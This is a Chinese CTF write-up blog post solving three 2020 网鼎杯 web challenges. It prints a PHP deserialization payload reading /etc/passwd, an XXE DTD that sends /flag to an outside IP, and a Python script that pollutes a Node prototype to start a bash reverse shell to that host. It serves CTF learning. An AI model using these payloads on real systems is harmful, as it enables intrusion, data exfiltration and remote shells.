网鼎杯 2020(青龙)

2020-05-12 19:05:00
ctf - wp - 网鼎

再次吐槽一个队伍只能开一个容器,大早上起来迟迟不放web题。

AreUSerialz

反序列化利用,给出源码:

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

很简单,就一个弱类型比较,让op为数字2可以绕过__destruct里的强类型比较,$filename直接为要读的文件,这里有一个点就是需要绕过is_valid,但我们反序列化的对象里会有protected类型的属性,在反序列化时会产生<0x00>*<0x00>,也就是%00,其ascii为0,是无法通过is_valid。

p神在小密圈内曾经发过一个点就是在反序列化时,将s改为S,此时后面的字符串支持16进制表示,因此我们的0x00就可以改写为\00,因为在is_valid中是将我们序列化后的字符串逐个转为ascii然后进行对比,而因此\00会被解析为三个字符,且都在允许的范围内,因此可以成功绕过。

生成payload:

<?php
class FileHandler {

    protected $op = 2;
    protected $filename = "/etc/passwd";
    protected $content;

}

$a = new FileHandler("");
$s = serialize($a);
$b = str_replace("\00",'\00',$s);
echo str_replace("s:",'S:',$b);

至于为什么当时我直接使用相对路径读不到也是一个很迷的点,因为环境不一样,事后在buu上是可以直接读到的,不太清楚问题出在哪,后面也就是各种fuzz找到flag位置了。

这道题因为出题人的php版本较高,前面的绕过还可以用php7.2+的黑魔法,public属性直接反序列化就能用了。

FileJava

存在任意文件下载,上传文件时让它报错可以获取到web服务的路径:

照着先把web.xml读下来:

  <servlet>
    <servlet-name>DownloadServlet</servlet-name>
    <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>ListFileServlet</servlet-name>
    <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>ListFileServlet</servlet-name>
    <url-pattern>/ListFileServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>UploadServlet</servlet-name>
    <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>

把源码扒下来之后用jd-gui反编译。

发现源码在处理xlsx会导致xxe,参考:Apache-Poi-XXE-Analysis

修改 excel 文件中的 [Content_Types].xml/xl/workbook.xml/xl/worksheets/shee1.xml 中均可添加 xxepayload 触发漏洞。

这边随便新建个xlsx解压出来后改下[Content_Types].xml。

<!ENTITY % remote SYSTEM 'http://101.132.132.179:Port/xxe.dtd'>

dtd:

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % hhh "<!ENTITY &#37; send SYSTEM 'http://101.132.132.179:anoPort/?q=%file;'>">
%hhh;
%send;

因为规定了文件开头必须为excel-,当时在这里卡住了,然后gq师傅直接做了出来,后面复现的时候才看到。

notes

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

参考:undefsafe:CVE-2019-10795

其poc为:

var a = require("undefsafe");
var payload = "__proto__.toString";
a({},payload,"JHU");
console.log({}.toString);

可知是一个可以污染第一个传入的参数的原型链,寻找类似poc的代码段:

edit_note(id, author, raw) {
    undefsafe(this.note_list, id + '.author', author);
    undefsafe(this.note_list, id + '.raw_note', raw);
}
app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

note_list是一个字典,找下发现status处有个字典commands:

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
    for (let index in commands) {
        exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
            if (err) {
                return;
            }
            console.log(`stdout: ${stdout}`);
        });
    }
        res.send('OK');
        res.end();
    })

那么置id为__proto__,因为会写两次,那么author或者raw都可以是我们要执行的命令,之后访问一遍status就可以了。

因为没回显,这边弹个shell。

#-*- coding:utf-8 -*-
#__author__: HhhM
import requests
import json
import re


print("Start the program:")
url = "http://xxx/edit_note/"
headers = {"Content-Type": "application/json"}
id = "__proto__"
author = "bash -i >& /dev/tcp/101.132.132.179/port 0>&1"
raw = "123"
data = json.dumps({'id': id, "author": author, "raw": raw})
r = requests.post(url, headers=headers, data=data)
print(r.text)

flag就在根目录下。



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号